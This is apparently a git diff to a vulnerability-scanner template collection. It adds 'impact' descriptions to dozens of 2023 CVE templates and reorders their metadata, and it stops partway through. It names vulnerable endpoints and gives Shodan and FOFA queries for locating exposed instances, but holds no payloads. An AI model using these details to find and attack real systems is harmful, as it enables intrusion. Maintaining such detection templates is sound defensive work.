15ec6ce3b3..9a878dd1f0 100644 --- a/http/cves/2023/CVE-2023-1698.yaml +++ b/http/cves/2023/CVE-2023-1698.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | In multiple products of WAGO, a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behavior, Denial of Service, and full system compromise. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system. remediation: | Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-1730.yaml b/http/cves/2023/CVE-2023-1730.yaml index 9f3e49ee50..572a57f7e5 100644 --- a/http/cves/2023/CVE-2023-1730.yaml +++ b/http/cves/2023/CVE-2023-1730.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The SupportCandy WordPress plugin before 3.1.5 does not validate and escape user input before using it in an SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: Fixed in version 3.1.5 reference: - https://wpscan.com/vulnerability/44b51a56-ff05-4d50-9327-fc9bab74d4b7 diff --git a/http/cves/2023/CVE-2023-1835.yaml b/http/cves/2023/CVE-2023-1835.yaml index 30954cf750..83b5bb747c 100644 --- a/http/cves/2023/CVE-2023-1835.yaml +++ b/http/cves/2023/CVE-2023-1835.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Ninja Forms before 3.6.22 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of Ninja Forms (3.6.22 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-1890.yaml b/http/cves/2023/CVE-2023-1890.yaml index 9e09513484..cdf2cc80f8 100644 --- a/http/cves/2023/CVE-2023-1890.yaml +++ b/http/cves/2023/CVE-2023-1890.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 1.0.9. reference: - https://wpscan.com/vulnerability/8ef64490-30cd-4e07-9b7c-64f551944f3d diff --git a/http/cves/2023/CVE-2023-20073.yaml b/http/cves/2023/CVE-2023-20073.yaml index 116207bde0..849927069b 100644 --- a/http/cves/2023/CVE-2023-20073.yaml +++ b/http/cves/2023/CVE-2023-20073.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device. + impact: | + Successful exploitation of this vulnerability could lead to remote code execution or unauthorized access to sensitive information. remediation: | Apply the latest security patches provided by Cisco to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-2023.yaml b/http/cves/2023/CVE-2023-2023.yaml index adcd654c54..ce247f726f 100644 --- a/http/cves/2023/CVE-2023-2023.yaml +++ b/http/cves/2023/CVE-2023-2023.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 3.7.3 reference: - https://wpscan.com/vulnerability/8859843a-a8c2-4f7a-8372-67049d6ea317 diff --git a/http/cves/2023/CVE-2023-20864.yaml b/http/cves/2023/CVE-2023-20864.yaml index 95982b0f2a..3f1cd178ac 100644 --- a/http/cves/2023/CVE-2023-20864.yaml +++ b/http/cves/2023/CVE-2023-20864.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-20887.yaml b/http/cves/2023/CVE-2023-20887.yaml index 2a6848cd24..8621447d3d 100644 --- a/http/cves/2023/CVE-2023-20887.yaml +++ b/http/cves/2023/CVE-2023-20887.yaml @@ -7,6 +7,8 @@ info: description: | VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are vulnerable. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches provided by VMware to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-20888.yaml b/http/cves/2023/CVE-2023-20888.yaml index 1576dc2cbd..ede67d02f5 100644 --- a/http/cves/2023/CVE-2023-20888.yaml +++ b/http/cves/2023/CVE-2023-20888.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Aria Operations for Networks contains an authenticated deserialization vulnerability. A malicious actor with network access to VMware Aria Operations for Networks and valid 'member' role credentials may be able to perform a deserialization attack resulting in remote code execution. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches or updates provided by VMware to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-20889.yaml b/http/cves/2023/CVE-2023-20889.yaml index eb0cf15ee9..d40bb5410e 100644 --- a/http/cves/2023/CVE-2023-20889.yaml +++ b/http/cves/2023/CVE-2023-20889.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Aria Operations for Networks contains an information disclosure vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in information disclosure. + impact: | + Successful exploitation of this vulnerability can result in unauthorized access to sensitive information. remediation: | Apply the latest security patches provided by VMware to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-2130.yaml b/http/cves/2023/CVE-2023-2130.yaml index 654d46910c..e39f05b114 100644 --- a/http/cves/2023/CVE-2023-2130.yaml +++ b/http/cves/2023/CVE-2023-2130.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-2178.yaml b/http/cves/2023/CVE-2023-2178.yaml index f2da8bc885..309cd10db2 100644 --- a/http/cves/2023/CVE-2023-2178.yaml +++ b/http/cves/2023/CVE-2023-2178.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update Aajoda Testimonials plugin to version 2.2.2 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-22463.yaml b/http/cves/2023/CVE-2023-22463.yaml index 2233bb0300..e4cf230da6 100644 --- a/http/cves/2023/CVE-2023-22463.yaml +++ b/http/cves/2023/CVE-2023-22463.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | KubePi is a k8s panel. The jwt authentication function of KubePi through version 1.6.2 uses hard-coded Jwtsigkeys, resulting in the same Jwtsigkeys for all online projects. This means that an attacker can forge any jwt token to take over the administrator account of any online project. Furthermore, they may use the administrator to take over the k8s cluster of the target enterprise. `session.go`, the use of hard-coded JwtSigKey, allows an attacker to use this value to forge jwt tokens arbitrarily. The JwtSigKey is confidential and should not be hard-coded in the code. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access and control of the Kubernetes cluster. remediation: The vulnerability has been fixed in 1.6.3. In the patch, JWT key is specified in app.yml. If the user leaves it blank, a random key will be used. There are no workarounds aside from upgrading. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/KubePi/KubePi%20JwtSigKey%20%E7%99%BB%E9%99%86%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2023-22463.md @@ -19,14 +21,13 @@ info: epss-percentile: 0.26993 cpe: cpe:2.3:a:fit2cloud:kubepi:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: html:"kubepi" - fofa-query: "kubepi" + max-request: 1 vendor: fit2cloud product: kubepi + shodan-query: html:"kubepi" + fofa-query: "kubepi" tags: cve,cve2023,kubepi,k8s,auth-bypass - variables: name: "{{rand_base(6)}}" password: "{{rand_base(8)}}" diff --git a/http/cves/2023/CVE-2023-22478.yaml b/http/cves/2023/CVE-2023-22478.yaml index c24c0125b0..6a96be97f9 100644 --- a/http/cves/2023/CVE-2023-22478.yaml +++ b/http/cves/2023/CVE-2023-22478.yaml @@ -6,6 +6,8 @@ info: severity: high description: | KubePi is a modern Kubernetes panel. The API interfaces with unauthorized entities and may leak sensitive information. This issue has been patched in version 1.6.4. There are currently no known workarounds. + impact: | + An attacker can gain unauthorized access to sensitive information. remediation: | Upgrade KubePi to a version higher than v1.6.4 to mitigate the vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-22480.yaml b/http/cves/2023/CVE-2023-22480.yaml index 15aa673510..5f8088772f 100644 --- a/http/cves/2023/CVE-2023-22480.yaml +++ b/http/cves/2023/CVE-2023-22480.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | KubeOperator is an open source Kubernetes distribution focused on helping enterprises plan, deploy and operate production-level K8s clusters. In KubeOperator versions 3.16.3 and below, API interfaces with unauthorized entities and can leak sensitive information. This vulnerability could be used to take over the cluster under certain conditions. This issue has been patched in version 3.16.4. + impact: | + An attacker can download sensitive files from the KubeOperator Foreground kubeconfig file, potentially leading to unauthorized access or exposure of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-2252.yaml b/http/cves/2023/CVE-2023-2252.yaml index dc0101ad52..be19127ff5 100644 --- a/http/cves/2023/CVE-2023-2252.yaml +++ b/http/cves/2023/CVE-2023-2252.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: Fixed in version 7.5.4 reference: - https://wpscan.com/vulnerability/9da6eede-10d0-4609-8b97-4a5d38fa8e69 diff --git a/http/cves/2023/CVE-2023-22620.yaml b/http/cves/2023/CVE-2023-22620.yaml index f1c7ddba27..a073b53cb8 100644 --- a/http/cves/2023/CVE-2023-22620.yaml +++ b/http/cves/2023/CVE-2023-22620.yaml @@ -6,6 +6,8 @@ info: severity: high description: | An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or perform actions on behalf of the user. remediation: Upgrade to version 12.2.5.1 or newer reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-22620 diff --git a/http/cves/2023/CVE-2023-2272.yaml b/http/cves/2023/CVE-2023-2272.yaml index 4d09d119cd..bd9df48141 100644 --- a/http/cves/2023/CVE-2023-2272.yaml +++ b/http/cves/2023/CVE-2023-2272.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Tiempo.com before 0.1.2 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to a patched version of Tiempo.com (version 0.1.3 or above) that addresses the XSS vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-22897.yaml b/http/cves/2023/CVE-2023-22897.yaml index 573538e395..8ef12fa502 100644 --- a/http/cves/2023/CVE-2023-22897.yaml +++ b/http/cves/2023/CVE-2023-22897.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows information disclosure of memory contents to be achieved by an authenticated user. Essentially, uninitialized data can be retrieved via an approach in which a sessionid is obtained but not used. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information stored in the device's memory. remediation: | Apply the latest security patches and updates provided by Securepoint to fix the memory leakage issue. reference: diff --git a/http/cves/2023/CVE-2023-23161.yaml b/http/cves/2023/CVE-2023-23161.yaml index 169dac7424..30c461a496 100644 --- a/http/cves/2023/CVE-2023-23161.yaml +++ b/http/cves/2023/CVE-2023-23161.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A reflected cross-site scripting (XSS) vulnerability in Art Gallery Management System Project v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the artname parameter under ART TYPE option in the navigation bar. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-23333.yaml b/http/cves/2023/CVE-2023-23333.yaml index 01aac8f17f..469eba2735 100644 --- a/http/cves/2023/CVE-2023-23333.yaml +++ b/http/cves/2023/CVE-2023-23333.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SolarView Compact 6.00 was discovered to contain a command injection vulnerability, attackers can execute commands by bypassing internal restrictions through downloader.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the system. remediation: | Apply the latest patch or update provided by the vendor to fix the OS command injection vulnerability in SolarView Compact 6.00. reference: diff --git a/http/cves/2023/CVE-2023-23488.yaml b/http/cves/2023/CVE-2023-23488.yaml index 4824530442..58f11f6e18 100644 --- a/http/cves/2023/CVE-2023-23488.yaml +++ b/http/cves/2023/CVE-2023-23488.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Paid Memberships Pro plugin before 2.9.8 contains a blind SQL injection vulnerability in the 'code' parameter of the /pmpro/v1/order REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. remediation: | Upgrade to WordPress Paid Memberships Pro version 2.9.8 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-23489.yaml b/http/cves/2023/CVE-2023-23489.yaml index f6af90eb2b..7175b69e56 100644 --- a/http/cves/2023/CVE-2023-23489.yaml +++ b/http/cves/2023/CVE-2023-23489.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Easy Digital Downloads plugin 3.1.0.2 and 3.1.0.3 contains a SQL injection vulnerability in the s parameter of its edd_download_search action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. remediation: | Update to the latest version of Easy Digital Downloads plugin (3.1.0.4 or higher) to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-23492.yaml b/http/cves/2023/CVE-2023-23492.yaml index 99f0ce41f5..57a42d8410 100644 --- a/http/cves/2023/CVE-2023-23492.yaml +++ b/http/cves/2023/CVE-2023-23492.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Login with Phone Number, versions < 1.4.2, is affected by an reflected XSS vulnerability in the login-with-phonenumber.php' file in the 'lwp_forgot_password()' function. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to the theft of sensitive user information or unauthorized actions. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml index 272a4d6022..575840e81d 100644 --- a/http/cves/2023/CVE-2023-2356.yaml +++ b/http/cves/2023/CVE-2023-2356.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Relative Path Traversal in GitHub repository mlflow/mlflow prior to 2.3.1. + impact: | + Successful exploitation could allow an attacker to read sensitive files on the server. remediation: | Upgrade Mlflow to version 2.3.0 or above to mitigate the vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-23752.yaml b/http/cves/2023/CVE-2023-23752.yaml index fa678439d2..110df3a6c5 100644 --- a/http/cves/2023/CVE-2023-23752.yaml +++ b/http/cves/2023/CVE-2023-23752.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints. + impact: | + The vulnerability can lead to unauthorized access to user passwords, compromising the confidentiality of user accounts. remediation: Upgrade to Joomla! version 4.2.8 or later. reference: - https://unsafe.sh/go-149780.html diff --git a/http/cves/2023/CVE-2023-24044.yaml b/http/cves/2023/CVE-2023-24044.yaml index 5f45303bd9..a5d08aa427 100644 --- a/http/cves/2023/CVE-2023-24044.yaml +++ b/http/cves/2023/CVE-2023-24044.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Plesk Obsidian through 18.0.49 contains an open redirect vulnerability via the login page. An attacker can redirect users to malicious websites via a host request header and thereby access user credentials and execute unauthorized operations. NOTE: The vendor's position is "the ability to use arbitrary domain names to access the panel is an intended feature." + impact: | + Successful exploitation of this vulnerability could allow an attacker to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. remediation: | Upgrade Plesk Obsidian to a version higher than 18.0.49 to mitigate the vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-24243.yaml b/http/cves/2023/CVE-2023-24243.yaml index c8aef5e22e..5a8ca9f8ab 100644 --- a/http/cves/2023/CVE-2023-24243.yaml +++ b/http/cves/2023/CVE-2023-24243.yaml @@ -6,6 +6,8 @@ info: severity: high description: | CData RSB Connect v22.0.8336 was discovered to contain a Server-Side Request Forgery (SSRF). + impact: | + Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the server, potentially leading to unauthorized access or data leakage. remediation: | Apply the latest security patches or updates provided by CData to fix the SSRF vulnerability in RSB Connect v22.0.8336. reference: diff --git a/http/cves/2023/CVE-2023-24278.yaml b/http/cves/2023/CVE-2023-24278.yaml index b8f277d126..eed835e0b0 100644 --- a/http/cves/2023/CVE-2023-24278.yaml +++ b/http/cves/2023/CVE-2023-24278.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Squidex before 7.4.0 contains a cross-site scripting vulnerability via the squid.svg endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to Squidex CMS version 7.4.0 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-24367.yaml b/http/cves/2023/CVE-2023-24367.yaml index c01677389d..a7062dbd04 100644 --- a/http/cves/2023/CVE-2023-24367.yaml +++ b/http/cves/2023/CVE-2023-24367.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Temenos T24 release 20 contains a reflected cross-site scripting vulnerability via the routineName parameter at genrequest.jsp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Apply the latest security patches or updates provided by the vendor to fix this vulnerability. Additionally, implement input validation and output encoding to prevent XSS attacks. reference: diff --git a/http/cves/2023/CVE-2023-24488.yaml b/http/cves/2023/CVE-2023-24488.yaml index 976a91489e..0da4eea033 100644 --- a/http/cves/2023/CVE-2023-24488.yaml +++ b/http/cves/2023/CVE-2023-24488.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Citrix ADC and Citrix Gateway versions before 13.1 and 13.1-45.61, 13.0 and 13.0-90.11, 12.1 and 12.1-65.35 contain a cross-site scripting vulnerability due to improper input validation. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the necessary patches or updates provided by Citrix to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-24489.yaml b/http/cves/2023/CVE-2023-24489.yaml index 0785a171a4..386a3de364 100644 --- a/http/cves/2023/CVE-2023-24489.yaml +++ b/http/cves/2023/CVE-2023-24489.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A vulnerability has been discovered in the customer-managed ShareFile storage zones controller which, if exploited, could allow an unauthenticated attacker to remotely compromise the customer-managed ShareFile storage zones controller. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-24657.yaml b/http/cves/2023/CVE-2023-24657.yaml index 1ca9349ca2..035f1f030f 100644 --- a/http/cves/2023/CVE-2023-24657.yaml +++ b/http/cves/2023/CVE-2023-24657.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | phpIPAM 1.6 contains a cross-site scripting vulnerability via the closeClass parameter at /subnet-masks/popup.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of phpIPAM or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2023/CVE-2023-24733.yaml b/http/cves/2023/CVE-2023-24733.yaml index 4d649f5cc6..bfa65e6022 100644 --- a/http/cves/2023/CVE-2023-24733.yaml +++ b/http/cves/2023/CVE-2023-24733.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | PMB 7.4.6 contains a cross-site scripting vulnerability via the query parameter at /admin/convert/export_z3950_new.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of PMB. reference: diff --git a/http/cves/2023/CVE-2023-24735.yaml b/http/cves/2023/CVE-2023-24735.yaml index 85caf35c6d..39f51d90d8 100644 --- a/http/cves/2023/CVE-2023-24735.yaml +++ b/http/cves/2023/CVE-2023-24735.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | PMB v7.4.6 contains an open redirect vulnerability via the component /opac_css/pmb.php. An attacker can redirect a user to an external domain via a crafted URL and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. remediation: | Upgrade PMB to a version that has addressed the open redirect vulnerability (CVE-2023-24735). reference: diff --git a/http/cves/2023/CVE-2023-24737.yaml b/http/cves/2023/CVE-2023-24737.yaml index 56df907e6f..e130ce9ec6 100644 --- a/http/cves/2023/CVE-2023-24737.yaml +++ b/http/cves/2023/CVE-2023-24737.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | PMB v7.4.6 allows an attacker to perform a reflected XSS on export_z3950.php via the 'query' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of PMB. reference: diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml index 24ee7f3b52..4c0dfb6dd5 100644 --- a/http/cves/2023/CVE-2023-25135.yaml +++ b/http/cves/2023/CVE-2023-25135.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.ambionics.io/blog/vbulletin-unserializable-but-unreachable diff --git a/http/cves/2023/CVE-2023-25157.yaml b/http/cves/2023/CVE-2023-25157.yaml index 1b8c23df0c..7d0a975333 100644 --- a/http/cves/2023/CVE-2023-25157.yaml +++ b/http/cves/2023/CVE-2023-25157.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest security patches or updates provided by the GeoServer project to fix the SQL Injection vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-25346.yaml b/http/cves/2023/CVE-2023-25346.yaml index f4e0d7c210..70f93434cc 100644 --- a/http/cves/2023/CVE-2023-25346.yaml +++ b/http/cves/2023/CVE-2023-25346.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to a patched version of ChurchCRM or apply the necessary security patches to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-25573.yaml b/http/cves/2023/CVE-2023-25573.yaml index 28804f27ea..b7b8b40313 100644 --- a/http/cves/2023/CVE-2023-25573.yaml +++ b/http/cves/2023/CVE-2023-25573.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Metersphere is an open source continuous testing platform. In affected versions an improper access control vulnerability exists in `/api/jmeter/download/files`, which allows any user to download any file without authentication. This issue may expose all files available to the running process. This issue has been addressed in version 1.20.20 lts and 2.7.1 + impact: | + This vulnerability can lead to unauthorized access to sensitive information, such as configuration files, credentials, and other sensitive data. remediation: Users are advised to upgrade. There are no known workarounds for this vulnerability. reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Metersphere%20file%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2023-25573.md @@ -20,13 +22,12 @@ info: epss-percentile: 0.34763 cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - fofa-query: body="Metersphere" + max-request: 1 vendor: metersphere product: metersphere + fofa-query: body="Metersphere" tags: cve,cve2023,metersphere,lfi - variables: str: "{{rand_base(4)}}" rand: "{{rand_base(3)}}" diff --git a/http/cves/2023/CVE-2023-25717.yaml b/http/cves/2023/CVE-2023-25717.yaml index 500447f9b4..cb58c98113 100644 --- a/http/cves/2023/CVE-2023-25717.yaml +++ b/http/cves/2023/CVE-2023-25717.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request. + impact: | + Remote code execution vulnerability in Ruckus Wireless Admin allows attackers to execute arbitrary code on the target system. remediation: | Apply the latest security patches and updates provided by Ruckus Wireless to mitigate the vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-26067.yaml b/http/cves/2023/CVE-2023-26067.yaml index 